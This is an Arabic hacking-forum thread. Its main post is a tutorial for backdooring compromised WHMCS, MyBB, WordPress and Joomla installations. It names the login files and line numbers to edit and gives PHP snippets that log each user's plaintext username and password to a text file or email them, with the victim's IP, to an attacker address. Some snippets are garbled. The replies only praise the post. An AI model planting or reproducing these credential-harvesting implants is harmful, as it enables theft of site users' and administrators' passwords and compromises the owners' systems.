1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ درس ] تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

الموضوع في 'آمن المواقع والسيرفرات' بواسطة ساكن الروح, بتاريخ ‏23 مارس 2013.

كاتب الموضوع : ساكن الروح المشاهدات : 3,028 الردود : 16 ‏23 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ساكن الروح
    rank
    Developer

    عضو منذ:
    ‏16 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]

    غالبا ما نحب نستفيد من الموقع اللي وصلناه أو حابين نسحب باسورد منه

    اليوم حاولت أجمع أغلب الطرق الخاصة لتلغيم أشهر السكربتات و سحب الحسابات , العضويات و العملاء و باسوورداتهم

    نبدأ باذن الله

    1 - سكربت WHMCS :

    نلغمه و نسحب بيانات العملاء

    الطريقة هي كالتالي:

    نفتح ملف dologin.php

    و نبحث عن السطر رقم 42

    أو نبحث عن السطر التالي:


    كود PHP:
    42 --> $loginsuccess true;


    بعده مباشرة نضيف الكود التالي

    كود PHP:
    // By DamaneDz
    file_put_contents("Clients.txt","The UserName:{$username}\nThe Password:{$password}\n------------\n",FILE_APPEND);
    // By DamaneDz


    و بهذا راح تحفظ النتائج في ملف Members.txt

    اما اذا أردنا النتائج تصل الى الايميل نضيف الكود التالي

    كود PHP:
    function curPageURL() {
    $pageURL 'http';if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}$pageURL .= "://";
    if (
    $_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];} else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];}return $pageURL;}

    $url curPageURL();
    $ip = @getenv("REMOTE_ADDR");
    $hostname = @gethostbyaddr($ip);
    $message  "------------------+ WHMCS Clients +-----------------\n";
    $message .= "Forum URL            : {$url}\n";
    $message .= "Email                : {$username}\n";
    $message .= "Password             : {$password]}\n";
    $message .= "----------------------- By DamaneDz --------------------------\n";
    $message .= "Victim IP : {$ip}\n";
    $message .= "HostName : {$hostname}\n";
    $message .= "-------------------+ Created By DamaneDz +--------------------\n";
    $send"yourmail@mail.com";// Your Mail Here ;)
    $subject "{$url} | WHMCS Clients | {$ip}";
    $headers "From: | {$username} | WHMCS Clients<WHMCS@Rezult.CoM>";


    طبعا لا تنسى تغير الايميل yourmail@mail.com الى ايميلك

    2 - سكربت MyBB :

    أعتقد سكربت مشهور و غني عن التعريف منافس لVBulletin

    نلغمه و نسحب العضويات بالطريقة التالية:

    نفتح الملف member.php

    نبحث عن السطر رقم 1255

    أو عن الأسطر التالية:

    كود PHP:
    1254 --> my_setcookie("mybbuser"$user['uid']."_".$user['loginkey'], $remembertrue);
    1255 --> my_setcookie("sid"$session->sid, -1true);


    و نضيف تحتها مباشرة

    كود PHP:
    // By DamaneDz
    $Dz $db->simple_select("users""email""username='{$db->escape_string(my_strtolower($mybb->input['username']))}'");
    $email $db->fetch_field($Dz"email");
    file_put_contents("Members.txt","The  UserName:{$mybb->input['username']}\nThe  Password:{$mybb->input['password']}\nThe  Email:{$email}\n------------\n",FILE_APPEND);
    // By DamaneDz


    و النتائج نجدها في ملف Members.txt

    أما عن الايميل فالكود التالي

    كود PHP:
    $Dz $db->simple_select("users""email""username='{$db->escape_string(my_strtolower($mybb->input['username']))}'");
    $email $db->fetch_field($Dz"email");

    function 
    curPageURL() {
    $pageURL 'http';if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}$pageURL .= "://";
    if (
    $_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];} else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];}return $pageURL;}
    $url curPageURL();
    $url = @str_replace("member.php","",$url);
    $ip = @getenv("REMOTE_ADDR");
    $hostname = @gethostbyaddr($ip);
    $message  "------------------+ MyBB Member Account +-----------------\n";
    $message .= "Forum URL            : {$url}\n";
    $message .= "UserName             : {$mybb->input['username']}\n";
    $message .= "Password             : {$mybb->input['password']}\n";
    $message .= "Email                : {$email}\n";
    $message .= "----------------------- By DamaneDz --------------------------\n";
    $message .= "Victim IP : {$ip}\n";
    $message .= "HostName : {$hostname}\n";
    $message .= "-------------------+ Created By DamaneDz +--------------------\n";
    $send"yourmail@mail.com";// Your Mail Here ;)
    $subject "{$mybb->input['username']} | MyBB Member Account | {$url}";
    $headers "From: | {$mybb->input['username']} | MyBB Member Account<MyBB@Rezult.CoM>";
    mail($send,$subject,$message,$headers);


    بالطبع استعمل أحدهما و اذا أردت الاثنين معا لا تكرر السطرين و طبعا مرة أخرى لا تنسى تغير الايميل yourmail@mail.com الى ايميلك

    كود PHP:
    $Dz $db->simple_select("users""email""username='{$db->escape_string(my_strtolower($mybb->input['username']))}'");
    $email $db->fetch_field($Dz"email");


    خليهما مرة واحدة في الأول

    3 - سكربت WordPress :

    شفت ناس كثيرة مهتمة بتلغيمه و سحب باسورد صاحب الموقع

    فاليكم الطريقة البسيطة مني

    نفتح الملف wp-login.php

    و نبحث عن السطر 632

    أو الأسطر التالية

    كود PHP:
    632 --> if ( ( empty( $redirect_to ) || $redirect_to == 'wp-admin/' || $redirect_to == admin_url() ) ) {
    634 --> if ( is_multisite() && !get_active_blog_for_user($user->ID) && !is_super_admin$user->ID ) )


    و نضيف تحتها مباشرة

    كود PHP:
    // By DamaneDz
    file_put_contents("Account.txt","The UserName:{$_POST['log']}\nThe Password:{$_POST['pwd']}\n------------\n",FILE_APPEND);
    // By DamaneDz


    لحفظ النتائج في ملف نصي Account.txt

    أو النتائج الى الايميل الكود اسفله

    كود PHP:
    function curPageURL() {
    $pageURL 'http';if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}$pageURL .= "://";
    if (
    $_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];} else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];}return $pageURL;}
    $url curPageURL();
    $ip = @getenv("REMOTE_ADDR");
    $hostname = @gethostbyaddr($ip);
    $message  "------------------+ WordPress Account +-----------------\n";
    $message .= "Forum URL            : {$url}\n";
    $message .= "Email                : {$_POST['log']}\n";
    $message .= "Password             : {$_POST['pwd']}\n";
    $message .= "----------------------- By DamaneDz --------------------------\n";
    $message .= "Victim IP : {$ip}\n";
    $message .= "HostName : {$hostname}\n";
    $message .= "-------------------+ Created By DamaneDz +--------------------\n";
    $send"yourmail@mail.com";// Your Mail Here ;)
    $subject "{$url} | WordPress Account | {$ip}";
    $headers "From: | {$_POST['log']} | WordPress Account<WordPress@Rezult.CoM>";
    mail($send,$subject,$message,$headers);
    طبعا مرة أخرى لا تنسى تغير الايميل yourmail@mail.com الى ايميلك

    4 - سكربت Joomla :

    الطريقة نفتح الملف الموجود في المسار التالي

    كود PHP:
    /administrator/components/com_login/controller.php
    و نبحث عن السطر رقم 58

    أو الأسطر

    كود PHP:
    57 --> $result $app->login($credentials, array('action' => 'core.login.admin'));
    58 --> if (!($result instanceof Exception)) {
    نضيف تحتها مباشرة

    كود PHP:
    // By DamaneDz
    file_put_contents("Rezult.txt","The UserName:{$_POST['username']}\nThe  Password:{$_POST['passwd']}\n------------\n",FILE_APPEND);
    // By DamaneDz
    و النتائج تجدها في المسار

    كود PHP:
    administrator/Rezult.txt
    اما التبليغ ايميل فالكود التالي

    كود PHP:
    function curPageURL() {
    $pageURL 'http';if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}$pageURL .= "://";
    if (
    $_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];} else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];}return $pageURL;}
    $url curPageURL();
    $ip = @getenv("REMOTE_ADDR");
    $hostname = @gethostbyaddr($ip);
    $message  "------------------+ Joomla Account +-----------------\n";
    $message .= "Forum URL            : {$url}\n";
    $message .= "Email                : {$_POST['username']}\n";
    $message .= "Password             : {$_POST['passwd']}\n";
    $message .= "----------------------- By DamaneDz --------------------------\n";
    $message .= "Victim IP : {$ip}\n";
    $message .= "HostName : {$hostname}\n";
    $message .= "-------------------+ Created By DamaneDz +--------------------\n";
    $send"yourmail@mail.com";// Your Mail Here ;)
    $subject "{$url} | Joomla Account | {$ip}";
    $headers "From: | {$_POST['username']} | Joomla Account<Joomla@Rezult.CoM>";
    mail($send,$subject,$message,$headers);
    الايميل لا تنساه ^&:"^

    أحب أنوه نقطة مهمه جدآ الموضوع للمبدع
    DamaneDz

    أنا مجرد ناقل لموضوعه لمن يستفيد من الموضوع اتمنى شكر صاحبه
    &:"

    انتهى الموضوع و ان شاء الله يكون خرج عليكم بفائدة

    في المرفقات تجدون الشرح بالانجليزي

    بالتوفيق

    In The Attachement You Will Find The Explanation In English

    GooD Luck
    )5:"​
     

    الملفات المرفقة:



    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ĵÕķÊя ÌЯĄΘ
    rankrank
    Developer

    عضو منذ:
    ‏20 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    موضوع مفيد اخوي لك كل الشكر​
     


  4. غير متصل

    Murtadha Albejawe
    rankrank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    جزاك الله خيرآ حبيبي
    موضوع رائع &:":​
     


  5. غير متصل

    كراش المحارب
    DeveloPer Plus

    عضو منذ:
    ‏26 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    بآرك الله فيك ،
    واصل تميزك ،​
     


  6. غير متصل

    βłλςκ-Mλğĭ¢ĭάи
    rank
    Developer

    عضو منذ:
    ‏21 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    أبداع بلاحدود موضوع فعلآ مميز !:"


    ماشاء عله المبدع DamaneDz الله يوفقك ويسهل امره :{12}:


    تشكر صاحب الموضوع على النقل المميز :{8}:​
     


  7. غير متصل

    Dr.reo
    rank
    Developer

    عضو منذ:
    ‏6 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    بارك الله فيك شرح وافي وكافي
     


  8. غير متصل

    Dr.MwNs
    rankrank
    Developer

    عضو منذ:
    ‏12 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    وعليكم آلسسلآم ورحمة الله وبركـآته
    مـآ ششـآء الله آخي
    طرح آبدآعي
    وشششرح كـآفي وآفي
    آسستمر
    تسسستـآهل آلـ ++ وآلـ
    [​IMG]
    في آمـآن الله
     


  9. غير متصل

    محترف هكر
    DeveloPer Plus

    عضو منذ:
    ‏2 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    يعطيك العافية
     


  10. غير متصل

    سـلآشـ هـكــر
    DeveloPer Plus

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مآهو شغلك .}.!
    الإقامة:

    رد: تلغيم بعض السكربتات المشهورة(WHMCS-MyBB-WordPress-Joomla)

    &:":~.][مشكوور يعطيك العافية][.~ &:":

    :{1}:~.][واصل هالابداع يا مبدع][.~:{1}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...